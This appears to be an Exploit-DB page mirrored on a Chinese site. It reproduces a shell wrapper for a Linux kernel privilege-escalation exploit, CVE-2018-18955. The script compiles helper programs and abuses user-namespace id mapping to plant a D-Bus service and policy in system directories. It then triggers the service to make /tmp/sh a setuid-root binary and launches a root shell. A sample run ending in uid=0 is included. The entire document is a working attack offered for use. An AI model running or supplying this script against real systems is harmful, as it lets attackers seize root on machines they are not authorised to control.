扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 |
#!/bin/sh # # EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47165.zip # # wrapper for Jann Horn's exploit for CVE-2018-18955 # uses dbus service technique # --- # test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.dbus.sh # [*] Compiling... # [*] Creating /usr/share/dbus-1/system-services/org.subuid.Service.service... # [.] starting # [.] setting up namespace # [~] done, namespace sandbox set up # [.] mapping subordinate ids # [.] subuid: 165536 # [.] subgid: 165536 # [~] done, mapped subordinate ids # [.] executing subshell # [*] Creating /etc/dbus-1/system.d/org.subuid.Service.conf... # [.] starting # [.] setting up namespace # [~] done, namespace sandbox set up # [.] mapping subordinate ids # [.] subuid: 165536 # [.] subgid: 165536 # [~] done, mapped subordinate ids # [.] executing subshell # [*] Launching dbus service... # Error org.freedesktop.DBus.Error.NoReply: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken. # [+] Success: # -rwsrwxr-x 1 root root 8384 Jan4 18:31 /tmp/sh # [*] Cleaning up... # [*] Launching root shell: /tmp/sh # root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id # uid=0(root) gid=0(root) groups=0(root),1001(test) rootshell="/tmp/sh" service="org.subuid.Service" command_exists() { command -v "${1}" >/dev/null 2>/dev/null } if ! command_exists gcc; then echo '[-] gcc is not installed' exit 1 fi if ! command_exists /usr/bin/dbus-send; then echo '[-] dbus-send is not installed' exit 1 fi if ! command_exists /usr/bin/newuidmap; then echo '[-] newuidmap is not installed' exit 1 fi if ! command_exists /usr/bin/newgidmap; then echo '[-] newgidmap is not installed' exit 1 fi if ! test -w .; then echo '[-] working directory is not writable' exit 1 fi echo "[*] Compiling..." if ! gcc subuid_shell.c -o subuid_shell; then echo 'Compiling subuid_shell.c failed' exit 1 fi if ! gcc subshell.c -o subshell; then echo 'Compiling gcc_subshell.c failed' exit 1 fi if ! gcc rootshell.c -o "${rootshell}"; then echo 'Compiling rootshell.c failed' exit 1 fi echo "[*] Creating /usr/share/dbus-1/system-services/${service}.service..." cat << EOF > "${service}.service" [D-BUS Service] Name=${service} Exec=/bin/sh -c "/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}" User=root EOF echo "cp ${service}.service /usr/share/dbus-1/system-services/${service}.service" | ./subuid_shell ./subshell if ! test -r "/usr/share/dbus-1/system-services/${service}.service"; then echo '[-] Failed' /bin/rm "${rootshell}" exit 1 fi echo "[*] Creating /etc/dbus-1/system.d/${service}.conf..." cat << EOF > "${service}.conf" <!DOCTYPE busconfig PUBLIC "-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN" "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd"> <busconfig> <policy context="default"> <allow send_destination="${service}"/> </policy> </busconfig> EOF echo "cp ${service}.conf /etc/dbus-1/system.d/${service}.conf" | ./subuid_shell ./subshell if ! test -r "/etc/dbus-1/system.d/${service}.conf"; then echo '[-] Failed' /bin/rm "${rootshell}" exit 1 fi echo "[*] Launching dbus service..." /usr/bin/dbus-send --system --print-reply --dest="${service}" --type=method_call --reply-timeout=1 / "${service}" sleep 1 if ! test -u "${rootshell}"; then echo '[-] Failed' /bin/rm "${rootshell}" exit 1 fi echo '[+] Success:' /bin/ls -la "${rootshell}" echo '[*] Cleaning up...' /bin/rm subuid_shell /bin/rm subshell /bin/rm "${service}.conf" /bin/rm "${service}.service" echo "/bin/rm /usr/share/dbus-1/system-services/${service}.service" | $rootshell echo "/bin/rm /etc/dbus-1/system.d/${service}.conf" | $rootshell echo "[*] Launching root shell: ${rootshell}" $rootshell |
体验盒子
